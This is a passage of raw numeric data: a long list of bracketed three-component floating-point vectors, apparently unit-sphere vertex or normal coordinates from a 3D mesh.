[0.796284377575,-0.545040607452,-0.26241543889],
[0.752189457417,-0.582528710365,-0.308011889458],
[0.757998526096,-0.606988489628,-0.238753452897],
[0.379529476166,-0.486395716667,-0.787004828453],
[0.416404157877,-0.419940322638,-0.806385576725],
[0.346611320972,-0.436200261116,-0.830415487289],
[0.520354926586,-0.44894811511,-0.726413309574],
[0.553625464439,-0.378517180681,-0.74177056551],
[0.485873311758,-0.400663375854,-0.776785671711],
[0.450116455555,-0.352179646492,-0.820587992668],
[0.480284929276,-0.284414708614,-0.829719662666],
[0.413926929235,-0.3044308424,-0.857896447182],
[0.485873311758,-0.400663375854,-0.776785671711],
[0.450116455555,-0.352179646492,-0.820587992668],
[0.416404157877,-0.419940322638,-0.806385576725],
[0.65135627985,-0.398910075426,-0.645450055599],
[0.678621411324,-0.327040165663,-0.657660841942],
[0.618283927441,-0.353819847107,-0.701809465885],
[0.762617051601,-0.340069264174,-0.550243675709],
[0.782811582088,-0.269586592913,-0.560828924179],
[0.733673810959,-0.298754066229,-0.610302150249],
[0.700865805149,-0.256401896477,-0.665616393089],
[0.718357801437,-0.188148602843,-0.669747889042],
[0.665048420429,-0.213841319084,-0.715529501438],
[0.733673810959,-0.298754066229,-0.610302150249],
[0.700865805149,-0.256401896477,-0.665616393089],
[0.678621411324,-0.327040165663,-0.657660841942],
[0.506734728813,-0.217834427953,-0.834127128124],
[0.529480218887,-0.153434738517,-0.834331154823],
[0.468421578407,-0.174905076623,-0.866019308567],
[0.627150595188,-0.171839639544,-0.759706020355],
[0.643326640129,-0.108097285032,-0.757922053337],
[0.588087081909,-0.131048902869,-0.798110127449],
[0.548688352108,-0.091976031661,-0.830952167511],
[0.564633131027,-0.0339771322906,-0.82464236021],
[0.509656965733,-0.0549761541188,-0.858619451523],
[0.588087081909,-0.131048902869,-0.798110127449],
[0.548688352108,-0.091976031661,-0.830952167511],
[0.529480218887,-0.153434738517,-0.834331154823],
[0.618283927441,-0.353819847107,-0.701809465885],
[0.582528710365,-0.308011889458,-0.752189457417],
[0.553625464439,-0.378517180681,-0.74177056551],
[0.665048420429,-0.213841319084,-0.715529501438],
[0.627150595188,-0.171839639544,-0.759706020355],
[0.606988489628,-0.238753452897,-0.757998526096],
[0.545040607452,-0.26241543889,-0.796284377575],
[0.506734728813,-0.217834427953,-0.834127128124],
[0.480284929276,-0.284414708614,-0.829719662666],
[0.606988489628,-0.238753452897,-0.757998526096],
[0.545040607452,-0.26241543889,-0.796284377575],
[0.582528710365,-0.308011889458,-0.752189457417],
[0.550243675709,-0.762617051601,-0.340069264174],
[0.535965919495,-0.737060189247,-0.411682873964],
[0.486395716667,-0.787004828453,-0.379529476166],
[0.645450055599,-0.65135627985,-0.398910075426],
[0.628728508949,-0.619044244289,-0.470621615648],
[0.58378881216,-0.680853009224,-0.44230055809],
[0.517854511738,-0.706037700176,-0.483050197363],
[0.495975226164,-0.669751524925,-0.552667617798],
[0.44894811511,-0.726413309574,-0.520354926586],
[0.58378881216,-0.680853009224,-0.44230055809],
[0.517854511738,-0.706037700176,-0.483050197363],
[0.535965919495,-0.737060189247,-0.411682873964],
[0.726413309574,-0.520354926586,-0.44894811511],
[0.706037700176,-0.483050197363,-0.517854511738],
[0.669751524925,-0.552667617798,-0.495975226164],
[0.787004828453,-0.379529476166,-0.486395716667],
[0.762617051601,-0.340069264174,-0.550243675709],
[0.737060189247,-0.411682873964,-0.535965919495],
[0.680853009224,-0.44230055809,-0.58378881216],
[0.65135627985,-0.398910075426,-0.645450055599],
[0.619044244289,-0.470621615648,-0.628728508949],
[0.737060189247,-0.411682873964,-0.535965919495],
[0.680853009224,-0.44230055809,-0.58378881216],
[0.706037700176,-0.483050197363,-0.517854511738],
[0.470621615648,-0.628728508949,-0.619044244289],
[0.44230055809,-0.58378881216,-0.680853009224],
[0.398910075426,-0.645450055599,-0.65135627985],
[0.552667617798,-0.495975226164,-0.669751524925],
[0.520354926586,-0.44894811511,-0.726413309574],
[0.483050197363,-0.517854511738,-0.706037700176],
[0.411682873964,-0.535965919495,-0.737060189247],
[0.379529476166,-0.486395716667,-0.787004828453],
[0.340069264174,-0.550243675709,-0.762617051601],
[0.483050197363,-0.517854511738,-0.706037700176],
[0.411682873964,-0.535965919495,-0.737060189247],
[0.44230055809,-0.58378881216,-0.680853009224],
[0.669751524925,-0.552667617798,-0.495975226164],
[0.607478022575,-0.581951975822,-0.540649950504],
[0.628728508949,-0.619044244289,-0.470621615648],
[0.619044244289,-0.470621615648,-0.628728508949],
[0.552667617798,-0.495975226164,-0.669751524925],
[0.581951975822,-0.540649950504,-0.607478022575],
[0.540649950504,-0.607478022575,-0.581951975822],
[0.470621615648,-0.628728508949,-0.619044244289],
[0.495975226164,-0.669751524925,-0.552667617798],
[0.581951975822,-0.540649950504,-0.607478022575],
[0.540649950504,-0.607478022575,-0.581951975822],
[0.607478022575,-0.581951975822,-0.540649950504],
[0.475679844618,0.0,-0.8796184659],
[0.456712335348,-0.0568443164229,-0.887796461582],
[0.509656965733,-0.0549761541188,-0.858619451523],
[0.360324263573,0.0,-0.932827115059],
[0.334895044565,-0.0602079555392,-0.940329909325],
[0.398431301117,-0.0586068555713,-0.915323853493],
[0.434652328491,-0.117213711143,-0.892938017845],
[0.409316182137,-0.180623859167,-0.894335091114],
[0.468421578407,-0.174905076623,-0.866019308567],
[0.398431301117,-0.0586068555713,-0.915323853493],
[0.434652328491,-0.117213711143,-0.892938017845],
[0.456712335348,-0.0568443164229,-0.887796461582],
[0.225778326392,0.0,-0.974178731441],
[0.193714544177,-0.0626873448491,-0.979053080082],
[0.266443610191,-0.0615878328681,-0.961880862713],
[0.0770247355103,0.0,-0.997029185295],
[0.0394601933658,-0.0638479366899,-0.997179210186],
[0.117650069296,-0.0634539350867,-0.991025745869],
[0.158833146095,-0.128498718143,-0.978907585144],
[0.121444880962,-0.196501940489,-0.97295331955],
[0.199805602431,-0.193975359201,-0.960443258286],
[0.117650069296,-0.0634539350867,-0.991025745869],
[0.158833146095,-0.128498718143,-0.978907585144],
[0.193714544177,-0.0626873448491,-0.979053080082],
[0.380633711815,-0.246351331472,-0.891307473183],
[0.348686188459,-0.313436716795,-0.883275330067],
[0.413926929235,-0.3044308424,-0.857896447182],
[0.239766731858,-0.258633822203,-0.935745954514],
[0.202408134937,-0.327503234148,-0.922915279865],
[0.277958005667,-0.321246802807,-0.905284404755],
[0.313733518124,-0.380723625422,-0.869839549065],
[0.276221334934,-0.446935534477,-0.85085272789],
[0.346611320972,-0.436200261116,-0.830415487289],
[0.277958005667,-0.321246802807,-0.905284404755],
[0.313733518124,-0.380723625422,-0.869839549065],
[0.348686188459,-0.313436716795,-0.883275330067],
[0.266443610191,-0.0615878328681,-0.961880862713],
[0.306287169456,-0.123895764351,-0.943842172623],
[0.334895044565,-0.0602079555392,-0.940329909325],
[0.199805602431,-0.193975359201,-0.960443258286],
[0.239766731858,-0.258633822203,-0.935745954514],
[0.274516820908,-0.190361812711,-0.942551255226],
[0.34457308054,-0.185843646526,-0.920180141926],
[0.380633711815,-0.246351331472,-0.891307473183],
[0.409316182137,-0.180623859167,-0.894335091114],
[0.274516820908,-0.190361812711,-0.942551255226],
[0.34457308054,-0.185843646526,-0.920180141926],
[0.306287169456,-0.123895764351,-0.943842172623],
[-0.0770247355103,0.0,-0.997029185295],
[-0.117650069296,-0.0634539350867,-0.991025745869],
[-0.0394601933658,-0.0638479366899,-0.997179210186],
[-0.225778326392,0.0,-0.974178731441],
[-0.266443610191,-0.0615878328681,-0.961880862713],
[-0.193714544177,-0.0626873448491,-0.979053080082],
[-0.158833146095,-0.128498718143,-0.978907585144],
[-0.199805602431,-0.193975359201,-0.960443258286],
[-0.121444880962,-0.196501940489,-0.97295331955],
[-0.193714544177,-0.0626873448491,-0.979053080082],
[-0.158833146095,-0.128498718143,-0.978907585144],
[-0.117650069296,-0.0634539350867,-0.991025745869],
[-0.360324263573,0.0,-0.932827115059],
[-0.398431301117,-0.0586068555713,-0.915323853493],
[-0.334895044565,-0.0602079555392,-0.940329909325],
[-0.475679844618,0.0,-0.8796184659],
[-0.509656965733,-0.0549761541188,-0.858619451523],
[-0.456712335348,-0.0568443164229,-0.887796461582],
[-0.434652328491,-0.117213711143,-0.892938017845],
[-0.468421578407,-0.174905076623,-0.866019308567],
[-0.409316182137,-0.180623859167,-0.894335091114],
[-0.456712335348,-0.0568443164229,-0.887796461582],
[-0.434652328491,-0.117213711143,-0.892938017845],
[-0.398431301117,-0.0586068555713,-0.915323853493],
[-0.239766731858,-0.258633822203,-0.935745954514],
[-0.277958005667,-0.321246802807,-0.905284404755],
[-0.202408134937,-0.327503234148,-0.922915279865],
[-0.380633711815,-0.246351331472,-0.891307473183],
[-0.413926929235,-0.3044308424,-0.857896447182],
[-0.348686188459,-0.313436716795,-0.883275330067],
[-0.313733518124,-0.380723625422,-0.869839549065],
[-0.346611320972,-0.436200261116,-0.830415487289],
[-0.276221334934,-0.446935534477,-0.85085272789],
[-0.348686188459,-0.313436716795,-0.883275330067],
[-0.313733518124,-0.380723625422,-0.869839549065],
[-0.277958005667,-0.321246802807,-0.905284404755],
[-0.334895044565,-0.0602079555392,-0.940329909325],
[-0.306287169456,-0.123895764351,-0.943842172623],
[-0.266443610191,-0.0615878328681,-0.961880862713],
[-0.409316182137,-0.180623859167,-0.894335091114],
[-0.380633711815,-0.246351331472,-0.891307473183],
[-0.34457308054,-0.185843646526,-0.920180141926],
[-0.274516820908,-0.190361812711,-0.942551255226],
[-0.239766731858,-0.258633822203,-0.935745954514],
[-0.199805602431,-0.193975359201,-0.960443258286],
[-0.34457308054,-0.185843646526,-0.920180141926],
[-0.274516820908,-0.190361812711,-0.942551255226],
[-0.306287169456,-0.123895764351,-0.943842172623],
[0.236761152744,-0.510783493519,-0.826465010643],
[0.196083456278,-0.571085453033,-0.797127783298],
[0.269586592913,-0.560828924179,-0.782811582088],
[0.0809632539749,-0.524005174637,-0.847858190536],
[0.0399611219764,-0.581926107407,-0.81225925684],
[0.119124859571,-0.578244268894,-0.807120084763],
[0.154971644282,-0.62687343359,-0.763553202152],
[0.114190116525,-0.677466154099,-0.726636230946],
[0.188148602843,-0.669747889042,-0.718357801437],
[0.119124859571,-0.578244268894,-0.807120084763],
[0.154971644282,-0.62687343359,-0.763553202152],
[0.196083456278,-0.571085453033,-0.797127783298],
[-0.0809632539749,-0.524005174637,-0.847858190536],
[-0.119124859571,-0.578244268894,-0.807120084763],
[-0.0399611219764,-0.581926107407,-0.81225925684],
[-0.236761152744,-0.510783493519,-0.826465010643],
[-0.269586592913,-0.560828924179,-0.782811582088],
[-0.196083456278,-0.571085453033,-0.797127783298],
[-0.154971644282,-0.62687343359,-0.763553202152],
[-0.188148602843,-0.669747889042,-0.718357801437],
[-0.114190116525,-0.677466154099,-0.726636230946],
[-0.196083456278,-0.571085453033,-0.797127783298],
[-0.154971644282,-0.62687343359,-0.763553202152],
[-0.119124859571,-0.578244268894,-0.807120084763],
[0.0744211226702,-0.722495436668,-0.687358558178],
[0.0362210273743,-0.761889100075,-0.646693944931],
[0.108097285032,-0.757922053337,-0.643326640129],
[-0.0744211226702,-0.722495436668,-0.687358558178],
[-0.108097285032,-0.757922053337,-0.643326640129],
[-0.0362210273743,-0.761889100075,-0.646693944931],
[0.0,-0.79582041502,-0.605532705784],
[-0.0339771322906,-0.82464236021,-0.564633131027],
[0.0339771322906,-0.82464236021,-0.564633131027],
[-0.0362210273743,-0.761889100075,-0.646693944931],
[0.0,-0.79582041502,-0.605532705784],
[0.0362210273743,-0.761889100075,-0.646693944931],
[-0.0399611219764,-0.581926107407,-0.81225925684],
[0.0,-0.634539365768,-0.772890508175],
[0.0399611219764,-0.581926107407,-0.81225925684],
[-0.114190116525,-0.677466154099,-0.726636230946],
[-0.0744211226702,-0.722495436668,-0.687358558178],
[-0.0382858961821,-0.68142670393,-0.730884253979],
[0.0382858961821,-0.68142670393,-0.730884253979],
[0.0744211226702,-0.722495436668,-0.687358558178],
[0.114190116525,-0.677466154099,-0.726636230946],
[-0.0382858961821,-0.68142670393,-0.730884253979],
[0.0382858961821,-0.68142670393,-0.730884253979],
[0.0,-0.634539365768,-0.772890508175],
[-0.0394601933658,-0.0638479366899,-0.997179210186],
[0.0,-0.130150929093,-0.991494178772],
[0.0394601933658,-0.0638479366899,-0.997179210186],
[-0.121444880962,-0.196501940489,-0.97295331955],
[-0.0820460245013,-0.265506535769,-0.960611641407],
[-0.0407496243715,-0.197802826762,-0.979394435883],
[0.0407496243715,-0.197802826762,-0.979394435883],
[0.0820460245013,-0.265506535769,-0.960611641407],
[0.121444880962,-0.196501940489,-0.97295331955],
[-0.0407496243715,-0.197802826762,-0.979394435883],
[0.0407496243715,-0.197802826762,-0.979394435883],
[0.0,-0.130150929093,-0.991494178772],
[-0.202408134937,-0.327503234148,-0.922915279865],
[-0.162998497486,-0.395605653524,-0.903840482235],
[-0.123069040477,-0.33188316226,-0.935258030891],
[-0.276221334934,-0.446935534477,-0.85085272789],
[-0.236761152744,-0.510783493519,-0.826465010643],
[-0.20109423995,-0.455528259277,-0.867211103439],
[-0.122248865664,-0.461539924145,-0.878655850887],
[-0.0809632539749,-0.524005174637,-0.847858190536],
[-0.0410230122507,-0.464636415243,-0.88455080986],
[-0.20109423995,-0.455528259277,-0.867211103439],
[-0.122248865664,-0.461539924145,-0.878655850887],
[-0.162998497486,-0.395605653524,-0.903840482235],
[0.123069040477,-0.33188316226,-0.935258030891],
[0.162998497486,-0.395605653524,-0.903840482235],
[0.202408134937,-0.327503234148,-0.922915279865],
[0.0410230122507,-0.464636415243,-0.88455080986],
[0.0809632539749,-0.524005174637,-0.847858190536],
[0.122248865664,-0.461539924145,-0.878655850887],
[0.20109423995,-0.455528259277,-0.867211103439],
[0.236761152744,-0.510783493519,-0.826465010643],
[0.276221334934,-0.446935534477,-0.85085272789],
[0.122248865664,-0.461539924145,-0.878655850887],
[0.20109423995,-0.455528259277,-0.867211103439],
[0.162998497486,-0.395605653524,-0.903840482235],
[-0.123069040477,-0.33188316226,-0.935258030891],
[-0.04130198434,-0.334140062332,-0.941618084908],
[-0.0820460245013,-0.265506535769,-0.960611641407],
[-0.0410230122507,-0.464636415243,-0.88455080986],
[0.0410230122507,-0.464636415243,-0.88455080986],
[0.0,-0.400968074799,-0.916092038155],
[0.04130198434,-0.334140062332,-0.941618084908],
[0.123069040477,-0.33188316226,-0.935258030891],
[0.0820460245013,-0.265506535769,-0.960611641407],
[0.0,-0.400968074799,-0.916092038155],
[0.04130198434,-0.334140062332,-0.941618084908],
[-0.04130198434,-0.334140062332,-0.941618084908],
[-0.8796184659,-0.475679844618,0.0],
[-0.887796461582,-0.456712335348,-0.0568443164229],
[-0.858619451523,-0.509656965733,-0.0549761541188],
[-0.932827115059,-0.360324263573,0.0],
[-0.940329909325,-0.334895044565,-0.0602079555392],
[-0.915323853493,-0.398431301117,-0.0586068555713],
[-0.892938017845,-0.434652328491,-0.117213711143],
[-0.894335091114,-0.409316182137,-0.180623859167],
[-0.866019308567,-0.468421578407,-0.174905076623],
[-0.915323853493,-0.398431301117,-0.0586068555713],
[-0.892938017845,-0.434652328491,-0.117213711143],
[-0.887796461582,-0.456712335348,-0.0568443164229],
[-0.974178731441,-0.225778326392,0.0],
[-0.979053080082,-0.193714544177,-0.0626873448491],
[-0.961880862713,-0.266443610191,-0.0615878328681],
[-0.997029185295,-0.0770247355103,0.0],
[-0.997179210186,-0.0394601933658,-0.0638479366899],
[-0.991025745869,-0.117650069296,-0.0634539350867],
[-0.978907585144,-0.158833146095,-0.128498718143],
[-0.97295331955,-0.121444880962,-0.196501940489],
[-0.960443258286,-0.199805602431,-0.193975359201],
[-0.991025745869,-0.117650069296,-0.0634539350867],
[-0.978907585144,-0.158833146095,-0.128498718143],
[-0.979053080082,-0.193714544177,-0.0626873448491],
[-0.891307473183,-0.380633711815,-0.246351331472],
[-0.883275330067,-0.348686188459,-0.313436716795],
[-0.857896447182,-0.413926929235,-0.3044308424],
[-0.935745954514,-0.239766731858,-0.258633822203],
[-0.922915279865,-0.202408134937,-0.327503234148],
[-0.905284404755,-0.277958005667,-0.321246802807],
[-0.869839549065,-0.313733518124,-0.380723625422],
[-0.85085272789,-0.276221334934,-0.446935534477],
[-0.830415487289,-0.346611320972,-0.436200261116],
[-0.905284404755,-0.277958005667,-0.321246802807],
[-0.869839549065,-0.313733518124,-0.380723625422],
[-0.883275330067,-0.348686188459,-0.313436716795],
[-0.961880862713,-0.266443610191,-0.0615878328681],
[-0.943842172623,-0.306287169456,-0.123895764351],
[-0.940329909325,-0.334895044565,-0.0602079555392],
[-0.960443258286,-0.199805602431,-0.193975359201],
[-0.935745954514,-0.239766731858,-0.258633822203],
[-0.942551255226,-0.274516820908,-0.190361812711],
[-0.920180141926,-0.34457308054,-0.185843646526],
[-0.891307473183,-0.380633711815,-0.246351331472],
[-0.894335091114,-0.409316182137,-0.180623859167],
[-0.942551255226,-0.274516820908,-0.190361812711],
[-0.920180141926,-0.34457308054,-0.185843646526],
[-0.943842172623,-0.306287169456,-0.123895764351],
[-0.997029185295,0.0770247355103,0.0],
[-0.991025745869,0.117650069296,-0.0634539350867],
[-0.997179210186,0.0394601933658,-0.0638479366899],
[-0.974178731441,0.225778326392,0.0],
[-0.961880862713,0.266443610191,-0.0615878328681],
[-0.979053080082,0.193714544177,-0.0626873448491],
[-0.978907585144,0.158833146095,-0.128498718143],
[-0.960443258286,0.199805602431,-0.193975359201],
[-0.97295331955,0.121444880962,-0.196501940489],
[-0.979053080082,0.193714544177,-0.0626873448491],
[-0.978907585144,0.158833146095,-0.128498718143],
[-0.991025745869,0.117650069296,-0.0634539350867],
[-0.932827115059,0.360324263573,0.0],
[-0.915323853493,0.398431301117,-0.0586068555713],
[-0.940329909325,0.334895044565,-0.0602079555392],
[-0.8796184659,0.475679844618,0.0],
[-0.858619451523,0.509656965733,-0.0549761541188],
[-0.887796461582,0.456712335348,-0.0568443164229],
[-0.892938017845,0.434652328491,-0.117213711143],
[-0.866019308567,0.468421578407,-0.174905076623],
[-0.894335091114,0.409316182137,-0.180623859167],
[-0.887796461582,0.456712335348,-0.0568443164229],
[-0.892938017845,0.434652328491,-0.117213711143],
[-0.915323853493,0.398431301117,-0.0586068555713],
[-0.935745954514,0.239766731858,-0.258633822203],
[-0.905284404755,0.277958005667,-0.321246802807],
[-0.922915279865,0.202408134937,-0.327503234148],
[-0.891307473183,0.380633711815,-0.246351331472],
[-0.857896447182,0.413926929235,-0.3044308424],
[-0.883275330067,0.348686188459,-0.313436716795],
[-0.869839549065,0.313733518124,-0.380723625422],
[-0.830415487289,0.346611320972,-0.436200261116],
[-0.85085272789,0.276221334934,-0.446935534477],
[-0.883275330067,0.348686188459,-0.313436716795],
[-0.869839549065,0.313733518124,-0.380723625422],
[-0.905284404755,0.277958005667,-0.321246802807],
[-0.940329909325,0.334895044565,-0.0602079555392],
[-0.943842172623,0.306287169456,-0.123895764351],
[-0.961880862713,0.266443610191,-0.0615878328681],
[-0.894335091114,0.409316182137,-0.180623859167],
[-0.891307473183,0.380633711815,-0.246351331472],
[-0.920180141926,0.34457308054,-0.185843646526],
[-0.942551255226,0.274516820908,-0.190361812711],
[-0.935745954514,0.239766731858,-0.258633822203],
[-0.960443258286,0.199805602431,-0.193975359201],
[-0.920180141926,0.34457308054,-0.185843646526],
[-0.942551255226,0.274516820908,-0.190361812711],
[-0.943842172623,0.306287169456,-0.123895764351],
[-0.826465010643,-0.236761152744,-0.510783493519],
[-0.797127783298,-0.196083456278,-0.571085453033],
[-0.782811582088,-0.269586592913,-0.560828924179],
[-0.847858190536,-0.0809632539749,-0.524005174637],
[-0.81225925684,-0.0399611219764,-0.581926107407],
[-0.807120084763,-0.119124859571,-0.578244268894],
[-0.763553202152,-0.154971644282,-0.62687343359],
[-0.726636230946,-0.114190116525,-0.677466154099],
[-0.718357801437,-0.188148602843,-0.669747889042],
[-0.807120084763,-0.119124859571,-0.578244268894],
[-0.763553202152,-0.154971644282,-0.62687343359],
[-0.797127783298,-0.196083456278,-0.571085453033],
[-0.847858190536,0.0809632539749,-0.524005174637],
[-0.807120084763,0.119124859571,-0.578244268894],
[-0.81225925684,0.0399611219764,-0.581926107407],
[-0.826465010643,0.236761152744,-0.510783493519],
[-0.782811582088,0.269586592913,-0.560828924179],
[-0.797127783298,0.196083456278,-0.571085453033],
[-0.763553202152,0.154971644282,-0.62687343359],
[-0.718357801437,0.188148602843,-0.669747889042],
[-0.726636230946,0.114190116525,-0.677466154099],
[-0.797127783298,0.196083456278,-0.571085453033],
[-0.763553202152,0.154971644282,-0.62687343359],
[-0.807120084763,0.119124859571,-0.578244268894],
[-0.687358558178,-0.0744211226702,-0.722495436668],
[-0.646693944931,-0.0362210273743,-0.761889100075],
[-0.643326640129,-0.108097285032,-0.757922053337],
[-0.687358558178,0.0744211226702,-0.722495436668],
[-0.643326640129,0.108097285032,-0.757922053337],
[-0.646693944931,0.0362210273743,-0.761889100075],
[-0.605532705784,0.0,-0.79582041502],
[-0.564633131027,0.0339771322906,-0.82464236021],
[-0.564633131027,-0.0339771322906,-0.82464236021],
[-0.646693944931,0.0362210273743,-0.761889100075],
[-0.605532705784,0.0,-0.79582041502],
[-0.646693944931,-0.0362210273743,-0.761889100075],
[-0.81225925684,0.0399611219764,-0.581926107407],
[-0.772890508175,0.0,-0.634539365768],
[-0.81225925684,-0.0399611219764,-0.581926107407],
[-0.726636230946,0.114190116525,-0.677466154099],
[-0.687358558178,0.0744211226702,-0.722495436668],
[-0.730884253979,0.0382858961821,-0.68142670393],
[-0.730884253979,-0.0382858961821,-0.68142670393],
[-0.687358558178,-0.0744211226702,-0.722495436668],
[-0.726636230946,-0.114190116525,-0.677466154099],
[-0.730884253979,0.0382858961821,-0.68142670393],
[-0.730884253979,-0.0382858961821,-0.68142670393],
[-0.772890508175,0.0,-0.634539365768],
[-0.997179210186,0.0394601933658,-0.0638479366899],
[-0.991494178772,0.0,-0.130150929093],
[-0.997179210186,-0.0394601933658,-0.0638479366899],
[-0.97295331955,0.121444880962,-0.196501940489],
[-0.960611641407,0.0820460245013,-0.265506535769],
[-0.979394435883,0.0407496243715,-0.197802826762],
[-0.979394435883,-0.0407496243715,-0.197802826762],
[-0.960611641407,-0.0820460245013,-0.265506535769],
[-0.97295331955,-0.121444880962,-0.196501940489],
[-0.979394435883,0.0407496243715,-0.197802826762],
[-0.979394435883,-0.0407496243715,-0.197802826762],
[-0.991494178772,0.0,-0.130150929093],
[-0.922915279865,0.202408134937,-0.327503234148],
[-0.903840482235,0.162998497486,-0.395605653524],
[-0.935258030891,0.123069040477,-0.33188316226],
[-0.85085272789,0.276221334934,-0.446935534477],
[-0.826465010643,0.236761152744,-0.510783493519],
[-0.867211103439,0.20109423995,-0.455528259277],
[-0.878655850887,0.122248865664,-0.461539924145],
[-0.847858190536,0.0809632539749,-0.524005174637],
[-0.88455080986,0.0410230122507,-0.464636415243],
[-0.867211103439,0.20109423995,-0.455528259277],
[-0.878655850887,0.122248865664,-0.461539924145],
[-0.903840482235,0.162998497486,-0.395605653524],
[-0.935258030891,-0.123069040477,-0.33188316226],
[-0.903840482235,-0.162998497486,-0.395605653524],
[-0.922915279865,-0.202408134937,-0.327503234148],
[-0.88455080986,-0.0410230122507,-0.464636415243],
[-0.847858190536,-0.0809632539749,-0.524005174637],
[-0.878655850887,-0.122248865664,-0.461539924145],
[-0.867211103439,-0.20109423995,-0.455528259277],
[-0.826465010643,-0.236761152744,-0.510783493519],
[-0.85085272789,-0.276221334934,-0.446935534477],
[-0.878655850887,-0.122248865664,-0.461539924145],
[-0.867211103439,-0.20109423995,-0.455528259277],
[-0.903840482235,-0.162998497486,-0.395605653524],
[-0.935258030891,0.123069040477,-0.33188316226],
[-0.941618084908,0.04130198434,-0.334140062332],
[-0.960611641407,0.0820460245013,-0.265506535769],
[-0.88455080986,0.0410230122507,-0.464636415243],
[-0.88455080986,-0.0410230122507,-0.464636415243],
[-0.916092038155,0.0,-0.400968074799],
[-0.941618084908,-0.04130198434,-0.334140062332],
[-0.935258030891,-0.123069040477,-0.33188316226],
[-0.960611641407,-0.0820460245013,-0.265506535769],
[-0.916092038155,0.0,-0.400968074799],
[-0.941618084908,-0.04130198434,-0.334140062332],
[-0.941618084908,0.04130198434,-0.334140062332],
[-0.82464236021,0.564633131027,-0.0339771322906],
[-0.830952167511,0.548688352108,-0.091976031661],
[-0.858619451523,0.509656965733,-0.0549761541188],
[-0.757922053337,0.643326640129,-0.108097285032],
[-0.759706020355,0.627150595188,-0.171839639544],
[-0.798110127449,0.588087081909,-0.131048902869],
[-0.834331154823,0.529480218887,-0.153434738517],
[-0.834127128124,0.506734728813,-0.217834427953],
[-0.866019308567,0.468421578407,-0.174905076623],
[-0.798110127449,0.588087081909,-0.131048902869],
[-0.834331154823,0.529480218887,-0.153434738517],
[-0.830952167511,0.548688352108,-0.091976031661],
[-0.669747889042,0.718357801437,-0.188148602843],
[-0.665616393089,0.700865805149,-0.256401896477],
[-0.715529501438,0.665048420429,-0.213841319084],
[-0.560828924179,0.782811582088,-0.269586592913],
[-0.550243675709,0.762617051601,-0.340069264174],
[-0.610302150249,0.733673810959,-0.298754066229],
[-0.657660841942,0.678621411324,-0.327040165663],
[-0.645450055599,0.65135627985,-0.398910075426],
[-0.701809465885,0.618283927441,-0.353819847107],
[-0.610302150249,0.733673810959,-0.298754066229],
[-0.657660841942,0.678621411324,-0.327040165663],
[-0.665616393089,0.700865805149,-0.256401896477],
[-0.829719662666,0.480284929276,-0.284414708614],
[-0.820587992668,0.450116455555,-0.352179646492],
[-0.857896447182,0.413926929235,-0.3044308424],
[-0.74177056551,0.553625464439,-0.378517180681],
[-0.726413309574,0.520354926586,-0.44894811511],
[-0.776785671711,0.485873311758,-0.400663375854],
[-0.806385576725,0.416404157877,-0.419940322638],
[-0.787004828453,0.379529476166,-0.486395716667],
[-0.830415487289,0.346611320972,-0.436200261116],
[-0.776785671711,0.485873311758,-0.400663375854],
[-0.806385576725,0.416404157877,-0.419940322638],
[-0.820587992668,0.450116455555,-0.352179646492],
[-0.715529501438,0.665048420429,-0.213841319084],
[-0.757998526096,0.606988489628,-0.238753452897],
[-0.759706020355,0.627150595188,-0.171839639544],
[-0.701809465885,0.618283927441,-0.353819847107],
[-0.74177056551,0.553625464439,-0.378517180681],
[-0.752189457417,0.582528710365,-0.308011889458],
[-0.796284377575,0.545040607452,-0.26241543889],
[-0.829719662666,0.480284929276,-0.284414708614],
[-0.834127128124,0.506734728813,-0.217834427953],
[-0.752189457417,0.582528710365,-0.308011889458],
[-0.796284377575,0.545040607452,-0.26241543889],
[-0.757998526096,0.606988489628,-0.238753452897],
[-0.436200261116,0.830415487289,-0.346611320972],
[-0.419940322638,0.806385576725,-0.416404157877],
[-0.486395716667,0.787004828453,-0.379529476166],
[-0.3044308424,0.857896447182,-0.413926929235],
[-0.284414708614,0.829719662666,-0.480284929276],
[-0.352179646492,0.820587992668,-0.450116455555],
[-0.400663375854,0.776785671711,-0.485873311758],
[-0.378517180681,0.74177056551,-0.553625464439],
[-0.44894811511,0.726413309574,-0.520354926586],
[-0.352179646492,0.820587992668,-0.450116455555],
[-0.400663375854,0.776785671711,-0.485873311758],
[-0.419940322638,0.806385576725,-0.416404157877],
[-0.174905076623,0.866019308567,-0.468421578407],
[-0.153434738517,0.834331154823,-0.529480218887],
[-0.217834427953,0.834127128124,-0.506734728813],
[-0.0549761541188,0.858619451523,-0.509656965733],
[-0.0339771322906,0.82464236021,-0.564633131027],
[-0.091976031661,0.830952167511,-0.548688352108],
[-0.131048902869,0.798110127449,-0.588087081909],
[-0.108097285032,0.757922053337,-0.643326640129],
[-0.171839639544,0.759706020355,-0.627150595188],
[-0.091976031661,0.830952167511,-0.548688352108],
[-0.131048902869,0.798110127449,-0.588087081909],
[-0.153434738517,0.834331154823,-0.529480218887],
[-0.353819847107,0.701809465885,-0.618283927441],
[-0.327040165663,0.657660841942,-0.678621411324],
[-0.398910075426,0.645450055599,-0.65135627985],
[-0.213841319084,0.715529501438,-0.665048420429],
[-0.188148602843,0.669747889042,-0.718357801437],
[-0.256401896477,0.665616393089,-0.700865805149],
[-0.298754066229,0.610302150249,-0.733673810959],
[-0.269586592913,0.560828924179,-0.782811582088],
[-0.340069264174,0.550243675709,-0.762617051601],
[-0.256401896477,0.665616393089,-0.700865805149],
[-0.298754066229,0.610302150249,-0.733673810959],
[-0.327040165663,0.657660841942,-0.678621411324],
[-0.217834427953,0.834127128124,-0.506734728813],
[-0.26241543889,0.796284377575,-0.545040607452],
[-0.284414708614,0.829719662666,-0.480284929276],
[-0.171839639544,0.759706020355,-0.627150595188],
[-0.213841319084,0.715529501438,-0.665048420429],
[-0.238753452897,0.757998526096,-0.606988489628],
[-0.308011889458,0.752189457417,-0.582528710365],
[-0.353819847107,0.701809465885,-0.618283927441],
[-0.378517180681,0.74177056551,-0.553625464439],
[-0.238753452897,0.757998526096,-0.606988489628],
[-0.308011889458,0.752189457417,-0.582528710365],
[-0.26241543889,0.796284377575,-0.545040607452],
[-0.762617051601,0.340069264174,-0.550243675709],
[-0.733673810959,0.298754066229,-0.610302150249],
[-0.782811582088,0.269586592913,-0.560828924179],
[-0.65135627985,0.398910075426,-0.645450055599],
[-0.618283927441,0.353819847107,-0.701809465885],
[-0.678621411324,0.327040165663,-0.657660841942],
[-0.700865805149,0.256401896477,-0.665616393089],
[-0.665048420429,0.213841319084,-0.715529501438],
[-0.718357801437,0.188148602843,-0.669747889042],
[-0.678621411324,0.327040165663,-0.657660841942],
[-0.700865805149,0.256401896477,-0.665616393089],
[-0.733673810959,0.298754066229,-0.610302150249],
